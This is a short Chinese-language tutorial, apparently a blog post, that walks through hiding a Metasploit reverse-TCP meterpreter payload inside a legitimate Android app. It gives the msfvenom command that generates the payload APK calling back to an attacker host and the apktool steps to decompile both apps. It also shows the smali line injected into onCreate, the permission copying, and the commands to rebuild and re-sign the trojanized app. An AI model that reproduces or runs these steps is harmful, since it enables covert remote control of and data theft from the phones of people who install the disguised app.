参考
https://www.anquanke.com/post/id/86353 https://www.cxyzjd.com/article/polaris___/90700678 https://blog.csdn.net/weixin_52221158/article/details/125878898 https://www.freebuf.com/articles/network/279222.html https://www.freebuf.com/articles/system/332133.html https://www.freebuf.com/articles/network/247629.html
使用msfvenom生成一个预设定向连接kali主机的apk安卓应用
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > hack.apk使用apktool对两个软件进行反编译
//刚刚生成的安卓应用apktool d hack.apk -o hack//要进行注入木马的安卓应用apktool d wo.apk -o wo注入钩子
1.打开wo文件夹中的AndroidManifest.xml,寻找程序入口。 2.搜索Main和Launch关键词,定位到对应的smail文件。 3.打开对应的smail文件,搜索onCreate函数,找到bundle对象。 4.在onCreate函数,找到bundle对象,下面添加启动payload代码并且保存。
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V5.打开hack文件夹中的AndroidManifest.xml。 6.把AndroidManifest.xml中的<uses-permission android:开头的全部复制。 7.打开wo文件夹中的AndroidManifest.xml。 8.把刚刚复制到的粘贴到以<uses-permission android:开头的的下面并且保存。 9.把hack文件夹中的metasploit复制到wo文件夹中的smail/com/目录下。
编译
把wo文件夹重新编译成wo.apk
apktool b wo -o wo.apk生成密钥
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000解释: keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -keyalg RSA -keysize 密钥大小 -validity 天数
签名
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore wo.apk alias_name
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时
